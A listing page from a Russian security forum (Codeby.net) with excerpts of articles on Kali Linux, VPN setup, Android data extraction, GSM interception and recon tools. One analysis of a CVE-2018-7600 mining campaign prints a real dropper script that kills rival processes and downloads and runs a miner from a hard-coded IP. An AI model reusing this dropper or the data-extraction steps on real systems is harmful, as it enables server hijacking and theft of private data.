Форум информационной безопасности - Codeby.net

Статья 4 шага, которые необходимо предпринять для защиты своего ПК/ноутбука от угроз безопасности

  • 5 205
  • 3
Учитывая факт того, что в наше время компьютеры используются практически в каждом доме, это привело к разработке множества типов и методов взлома различными антисоциальными элементами. Основным способом, который служит идеальным средством для таких вредоносных атак, является интернет.
Существует несколько главных способов, используя которые вы можете защитить ваш ПК/ноутбук от различного рода угроз безопасности, включая активное использование эффективного антивирусного программного обеспечения, антишпионского программного обеспечения, а также установку брандмауэра и других средств защиты подобного рода. Всегда лучше ознакомиться с различными независимыми источниками и объективными обзорами данных продуктов, прежде чем использовать их. Более того, использование одного метода по отдельности не сможет обеспечить вашему компьютеру достаточную безопасность. Чем больше пластов защиты вы установите на свой компьютер, тем больше вы усложните работу хакерам, желающих взломать ваш ПК.
Итак, давайте познакомим вас с четырьмя основными шагами, которые необходимо проделать, чтобы защитить ваш компьютер/ноутбук от различного рода угроз...

Статья raspberry pi 3 с ос kali linux а также авто запуск ap+vnc

  • 20 401
  • 26
Цель: подготовить малину для пентеста wifi и т.п
Статья расписана максимально подробно для новичков
Для создания платформы нам потребуется
power bank мин. напряжение тока на выходе 2.4А (возможны проблемы из за недостаточного питания) ( я брал на ~20000 mah за 1000р)
raspberry pi 3(3500р) - корпус, радиатор,блок питания
адаптер tp-link tl-wn722n v1
CD карта 10 class 16 gb (~500р) - 10 класс для быстрого чтения и записи
заказывал все на ali
1.Скачаем архив с образом Kali Linux ARM Images
Извлекаем образ из архива
Screenshot_2.png

Скачаем и установим для записи ОС на SD Win32 Disk Imager
Screenshot_1.png

2.Запуск
Так как у меня нет разъема hdmi на мониторе , я подключаюсь к малине только по vnc или ssh.
После подключения малины к роутеру по ethernet сканируем локальную сеть на открытый 22 порт, также можно в админке роутера посмотреть ip raspberry
Подключаемся по ssh я использую Download PuTTY - a free SSH and telnet client for Windows
login root pass toor...

Статья Устанавливаем дополнения в Gnome3

  • 10 882
  • 24
Раньше в Gnome Tweak Tool можно было устанавливать расширения для окружения Gnome3 напрямую. Теперь эту функцию убрали.
Так же в firefox раньше совместимость с GNOME Shell Extensions была встроена по умолчанию, теперь её тоже выпилили.
Но немного поискав, я нашел на github простую и удобную консольную утилиту, позволяющую устанавливать расширения для любой версии Gnome.

Небольшая демонстрация работы с утилитой тут.

Установка

Зависимости:
  • bash
  • curl
  • dbus
  • perl
  • git (опционально)
  • less (опционально)
Код:
wget -O gnome-shell-extension-installer "https://github.com/brunelli/gnome-shell-extension-installer/raw/master/gnome-shell-extension-installer"
chmod +x gnome-shell-extension-installer
mv gnome-shell-extension-installer /usr/bin/

Помощь

Код:
Usage: gnome-shell-extension-installer EXTENSION_ID [EXTENSION_ID...] [GNOME_VERSION] [OPTIONS]

Options:

  -s or --search [STRING] Interactive search.

  --yes...

Статья Выпуск Kali Linux 2018.2

  • 5 239
  • 10
kali-release.png


Этот релиз Kali является первым, включившим ядро Linux 4.15, которое включает в себя x86 и x64 исправления для столь раздутых Spectre и Meltdown уязвимостей. Он также включает в себя гораздо лучшую поддержку для AMD GPUs и поддержку AMD Secure Encrypted Virtualization, которая позволяет шифровать память виртуальной машины, таким образом, что даже гипервизор не может получить доступ.

Облегчите доступ к скриптам Metasploit

Если вы проводите любое значительное количество времени на написание подвиги, вы несомненно знакомы с различными Metasploit сценариями, которые доступны, такие как pattern_create, pattern_offset, nasm_shell и т.д. Вам вероятно также известно, что все эти полезные скрипты находятся в /usr/share/metasploit-framework/tools/exploit/, что делает их сложновато...

Статья Установка Algo VPN на площадке DO

  • 7 159
  • 10
Как и обещал, пишу статью как развернуть VPN с помощью Algo на площадке DO (DigitalOcean)

Итак допустим у Вас есть учётка на DO, если нет идем регистрировать (это рефералка, вам капнет 10$)
Заходим в Личный кабинет, и создаем свою первую виртуалку
1525038443619.png

Я выбираю минимальную конфигурацию она мне нужна на 20-25 минут для установки VPN сервера
Если Вы будите использовать для установки VPN сервера свою локальную машину можете этот шаг пропустить, и перейти к разделу установки Algo

Я оставляю все без изменений, опускаюсь в самый низ и нажимаем на кнопку Create
Видим что наша виртуалка создалась
1525039029966.png
Копируем ее IP и пароль берем с нашей почты, и логинимся на нее.

При первом логине, нас сразу попросят сменить пароль, что и делаем
1525039206194.png

И вот начинаем установку
Код:
git clone https://github.com/trailofbits/algo.git

apt-get update && apt-get install \
    build-essential \
    libssl-dev \
    libffi-dev \
    python-dev \
    python-pip \
    python-setuptools \
    python-virtualenv -y
...

Android, Ищем интересности

  • 21 143
  • 27
N
Android. Ищем интересности.

Приветствую Вас, друзья!

Android, миллионы людей пользуются смартфонами с этой ОС, и конечно же многие в курсе что она построена на ядре линукс.

Android использует несколько файловых систем и несколько разделов для организации файлов и папок в устройстве. В разделах файловой системы представлены каталоги. В основном используются пять разделов, это boot, system, recovery, data, cache. Могут быть другие разделы, которые различаются в каждой модели, например, sdcard, sd-ext.

Хочу сразу оговорится что это не взлом и не руководство к действию, а маленькая ознакомительная статья в которой мы посмотрим что нам может открыть файловая система андроида, постараемся найти файлы которые могут быть там интересны. Я воспользуюсь ADB, но все тоже самое можно провернуть и с помощью сессии метерпретер.

Не буду рассказывать что такое ADB или как получить сессию метерпретер, благо информации об этом хватает)
Итак, начнем)

Как уже писал выше я использую ADB, запускаем демона и шел

adb1.png


Вытягиваем контакты и журнал звонков
Переходим в директорию с приложением контакты
/data/com.android.providers.contacts
и скачиваем...

Статья Вторая жизнь RTL-SDR

  • 8 341
  • 6
Всем привет. На форуме не так много информации на тему программно-определяемого радио (SDR) – поэтому хочу привлечь внимание общественности к столь интересной теме и совместно начать развивать данное направление. Для меня описанная информация была нова (хоть и лежит уже два года на гитхабе) и на форуме ранее не освещалась – поэтому хочу ей поделиться.

Уважаемый Piotr Krysik, разработчик продукта для декодирования GSM сигнала ptrkrysik/gr-gsm, провел интересное исследование, позволяющее за минимальные деньги получить многоканальный радиоприемник. Как и следовало ожидать – основой стал всеми любимый RTL-SDR «свисток».

Результатом трудов стала возможность при помощи GNURadio синхронизировать несколько RTL-SDR приемников, что позволяет, например, захватывать ни один канал GSM, а несколько, объединяя вывод в единое целое. @Ondrik8 уже описал схему перехвата СМС и голоса при помощи SDR, но в данной реализации — это сложно воссоздать в реальных условиях, так как мобильник «жертвы» постоянно норовит переключиться на соседний канал, с более...

Статья CVE-2018-7600 или майнер на серваке, исходники, аналитика, примеры ЧАСТЬ 2

  • 3 804
  • 2
Погнали дальше!

Как же все монетезировались? Покопавшись на серваках я начал находить одни и те же файлы с новой датой, присмотрелся - МАЙНЕР, мать его за ногу.
Код:
SA -
udevd
x11_kenp0le
xm111
Все они XMRig или его форки - тык

Пробежимся по коду который их прогружает (все IP не пашут):
Код:
#!/bin/sh

U="http://185.35.138.138/..."
O="http://185.35.138.138/.c"

killall -9 udevd
kill -9 'ps auwx|grep udevd|grep -v systemd|grep -v grep|awk '{ print $2 }'' 2>/dev/null

for d in 'pwd' /tmp /var/tmp /dev/shm /invalid /root /var/run; do
cd $d 2>/dev/null
if [ "$?" = "0" ]; then
cp /bin/ls . 2>/dev/null
if [ "$?" = "0" ]; then
./ls >/dev/null
if [ "$?" = "0" ]; then
rm -rf ls
rm -rf udevd ... .c
if hash curl 2>/dev/null; then
curl -s -LO "$U"
curl -s -LO "$O"
else
wget -q "$U"
wget -q "$O"
fi
mv ... udevd
chmod +x udevd
./udevd -c .c
exit
fi
fi
fi
done

Башевский код, файл загружается или через веб шелл, ставятся права 777 и потом через system/exec или другие аналоги в php стартуется.
Он убивает конкурентов, ищет папку с записью для текущих прав, качает JSON настройку и сам майнер curl...

Статья Striker - сканер для получения различной информации

  • 9 066
  • 6
vertigo1.png

🛡️ Striker: Ваш первый шаг в разведке для кибербезопасности

Входите в мир кибербезопасности? Ищете надежный инструмент для сбора информации? Striker — это сканер, который поможет новичкам и профессионалам эффективно проводить разведку целей, обнаруживая важные данные, от обхода Cloudflare до анализа серверов.

Узнайте о возможностях Striker, включая сбор заголовков, фингерпринтинг ОС, обнаружение CMS, Whois, сканирование портов и создание карт атаки. Получите информацию об электронных адресах и связях сервера. Простое использование и автоматизация делают Striker идеальным выбором для быстрого старта в сборе данных.

💡 Для всех, кто хочет начать применять практические навыки в информационной безопасности и освоить мощные инструменты разведки.
🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

Пользователи онлайн

Статистика форума

Темы
51 001
Сообщения
344 778
Пользователи
148 528
Новый пользователь
Гулсим